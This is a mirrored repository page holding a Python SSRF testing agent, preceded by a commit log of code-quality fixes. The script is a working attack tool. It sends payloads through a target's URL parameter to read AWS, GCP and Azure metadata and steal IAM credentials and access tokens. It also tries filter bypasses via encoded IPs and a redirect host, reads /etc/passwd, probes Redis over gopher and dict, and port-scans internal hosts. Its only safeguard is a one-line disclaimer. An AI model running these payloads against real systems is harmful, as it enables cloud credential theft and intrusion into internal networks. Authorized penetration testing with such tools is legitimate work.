mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-10 21:24:56 +03:00
c47eed6a64
- Fix 25 shell=True subprocess calls with list-based commands - Fix 49 verify=False in defensive skills (env-var override) - Add timeout to 231 HTTP/subprocess/socket calls - Fix 6 SQL injection patterns with whitelist validation - Replace 8 __import__() with standard imports - Remove 701 unused imports across 442 files - Add authorized-testing disclaimers to all offensive skills - Complete 11 incomplete skill directories - Expand 10 stub SKILL.md files with full content - Fix 2 YAML parse errors in frontmatter - Fix 5 pre-existing syntax errors - Convert 22 hardcoded paths/ports to environment variables - Back up 21 redundant skill pairs to .bak - Fix 2 global declaration errors - 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE) - 0 compile errors across all 724 agent.py files
175 lines
7.4 KiB
Python
175 lines
7.4 KiB
Python
#!/usr/bin/env python3
|
|
# For authorized penetration testing and lab environments only
|
|
"""SSRF Vulnerability Testing Agent - Tests for Server-Side Request Forgery via URL parameters."""
|
|
|
|
import json
|
|
import logging
|
|
import argparse
|
|
from datetime import datetime
|
|
|
|
import requests
|
|
|
|
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
|
|
logger = logging.getLogger(__name__)
|
|
|
|
METADATA_PAYLOADS = [
|
|
{"name": "AWS IMDSv1 metadata", "url": "http://169.254.169.254/latest/meta-data/", "indicator": "ami-id"},
|
|
{"name": "AWS IAM credentials", "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "indicator": "AccessKeyId"},
|
|
{"name": "AWS user-data", "url": "http://169.254.169.254/latest/user-data", "indicator": ""},
|
|
{"name": "GCP metadata", "url": "http://metadata.google.internal/computeMetadata/v1/", "indicator": "attributes"},
|
|
{"name": "GCP service account token", "url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token", "indicator": "access_token"},
|
|
{"name": "Azure IMDS", "url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01", "indicator": "compute"},
|
|
{"name": "Azure managed identity", "url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/", "indicator": "access_token"},
|
|
]
|
|
|
|
INTERNAL_SCAN_PORTS = [22, 80, 443, 3306, 5432, 6379, 8080, 8443, 9200, 27017]
|
|
|
|
BYPASS_PAYLOADS = [
|
|
{"name": "Decimal IP", "url": "http://2852039166/latest/meta-data/"},
|
|
{"name": "Hex IP", "url": "http://0xa9fea9fe/latest/meta-data/"},
|
|
{"name": "Octal IP", "url": "http://0251.0376.0251.0376/latest/meta-data/"},
|
|
{"name": "IPv6 mapped", "url": "http://[::ffff:169.254.169.254]/latest/meta-data/"},
|
|
{"name": "Short URL localhost", "url": "http://0/"},
|
|
{"name": "Redirect bypass", "url": "http://spoofed.burpcollaborator.net/redirect?url=http://169.254.169.254/"},
|
|
{"name": "DNS rebinding", "url": "http://a]@169.254.169.254/latest/meta-data/"},
|
|
]
|
|
|
|
|
|
def test_ssrf_payload(target_url, ssrf_payload, timeout=10):
|
|
"""Send an SSRF payload through the target URL parameter."""
|
|
test_url = f"{target_url}{ssrf_payload}"
|
|
try:
|
|
resp = requests.get(test_url, timeout=timeout, allow_redirects=False, verify=False)
|
|
return {
|
|
"status_code": resp.status_code,
|
|
"response_length": len(resp.content),
|
|
"response_preview": resp.text[:500],
|
|
"headers": dict(resp.headers),
|
|
}
|
|
except requests.RequestException as e:
|
|
return {"error": str(e)}
|
|
|
|
|
|
def test_metadata_endpoints(target_url):
|
|
"""Test cloud metadata SSRF payloads."""
|
|
findings = []
|
|
for payload in METADATA_PAYLOADS:
|
|
result = test_ssrf_payload(target_url, payload["url"])
|
|
vulnerable = False
|
|
if "error" not in result:
|
|
if result["status_code"] == 200 and result["response_length"] > 10:
|
|
if payload["indicator"] and payload["indicator"] in result.get("response_preview", ""):
|
|
vulnerable = True
|
|
elif not payload["indicator"] and result["response_length"] > 50:
|
|
vulnerable = True
|
|
findings.append({
|
|
"test": payload["name"],
|
|
"payload": payload["url"],
|
|
"vulnerable": vulnerable,
|
|
"severity": "critical" if vulnerable else "info",
|
|
"response_status": result.get("status_code"),
|
|
"response_length": result.get("response_length", 0),
|
|
})
|
|
if vulnerable:
|
|
logger.warning("SSRF confirmed: %s", payload["name"])
|
|
return findings
|
|
|
|
|
|
def test_internal_port_scan(target_url, internal_ip="127.0.0.1"):
|
|
"""Use SSRF to scan internal ports."""
|
|
open_ports = []
|
|
for port in INTERNAL_SCAN_PORTS:
|
|
payload = f"http://{internal_ip}:{port}/"
|
|
result = test_ssrf_payload(target_url, payload, timeout=5)
|
|
if "error" not in result and result["status_code"] != 502:
|
|
open_ports.append({
|
|
"ip": internal_ip,
|
|
"port": port,
|
|
"status": result["status_code"],
|
|
"response_length": result["response_length"],
|
|
})
|
|
logger.info("Internal port open: %s:%d (status: %d)", internal_ip, port, result["status_code"])
|
|
return open_ports
|
|
|
|
|
|
def test_bypass_techniques(target_url):
|
|
"""Test SSRF filter bypass techniques."""
|
|
bypass_results = []
|
|
for payload in BYPASS_PAYLOADS:
|
|
result = test_ssrf_payload(target_url, payload["url"], timeout=5)
|
|
success = "error" not in result and result.get("status_code") == 200 and result.get("response_length", 0) > 10
|
|
bypass_results.append({
|
|
"technique": payload["name"],
|
|
"payload": payload["url"],
|
|
"bypassed": success,
|
|
"severity": "high" if success else "info",
|
|
})
|
|
if success:
|
|
logger.warning("SSRF bypass succeeded: %s", payload["name"])
|
|
return bypass_results
|
|
|
|
|
|
def test_protocol_handlers(target_url):
|
|
"""Test non-HTTP protocol handlers for SSRF."""
|
|
protocols = [
|
|
{"name": "file:// protocol", "url": "file:///etc/passwd", "indicator": "root:"},
|
|
{"name": "gopher:// protocol", "url": "gopher://127.0.0.1:6379/_INFO", "indicator": "redis"},
|
|
{"name": "dict:// protocol", "url": "dict://127.0.0.1:6379/INFO", "indicator": "redis"},
|
|
]
|
|
results = []
|
|
for proto in protocols:
|
|
result = test_ssrf_payload(target_url, proto["url"], timeout=5)
|
|
vulnerable = (
|
|
"error" not in result
|
|
and result.get("status_code") == 200
|
|
and proto["indicator"] in result.get("response_preview", "")
|
|
)
|
|
results.append({
|
|
"protocol": proto["name"],
|
|
"payload": proto["url"],
|
|
"vulnerable": vulnerable,
|
|
"severity": "critical" if vulnerable else "info",
|
|
})
|
|
return results
|
|
|
|
|
|
def generate_report(metadata_findings, port_scan, bypass_results, protocol_results):
|
|
"""Generate SSRF assessment report."""
|
|
critical = (
|
|
[f for f in metadata_findings if f["vulnerable"]]
|
|
+ [b for b in bypass_results if b["bypassed"]]
|
|
+ [p for p in protocol_results if p["vulnerable"]]
|
|
)
|
|
report = {
|
|
"timestamp": datetime.utcnow().isoformat(),
|
|
"metadata_tests": metadata_findings,
|
|
"internal_port_scan": port_scan,
|
|
"bypass_techniques": bypass_results,
|
|
"protocol_handlers": protocol_results,
|
|
"vulnerabilities_found": len(critical),
|
|
}
|
|
print(f"SSRF REPORT: {len(critical)} vulnerabilities found")
|
|
return report
|
|
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(description="SSRF Vulnerability Testing Agent")
|
|
parser.add_argument("--target-url", required=True, help="Target URL with SSRF parameter (e.g. https://app/fetch?url=)")
|
|
parser.add_argument("--internal-ip", default="127.0.0.1", help="Internal IP for port scan")
|
|
parser.add_argument("--output", default="ssrf_report.json")
|
|
args = parser.parse_args()
|
|
|
|
metadata = test_metadata_endpoints(args.target_url)
|
|
ports = test_internal_port_scan(args.target_url, args.internal_ip)
|
|
bypasses = test_bypass_techniques(args.target_url)
|
|
protocols = test_protocol_handlers(args.target_url)
|
|
|
|
report = generate_report(metadata, ports, bypasses, protocols)
|
|
with open(args.output, "w") as f:
|
|
json.dump(report, f, indent=2)
|
|
logger.info("Report saved to %s", args.output)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|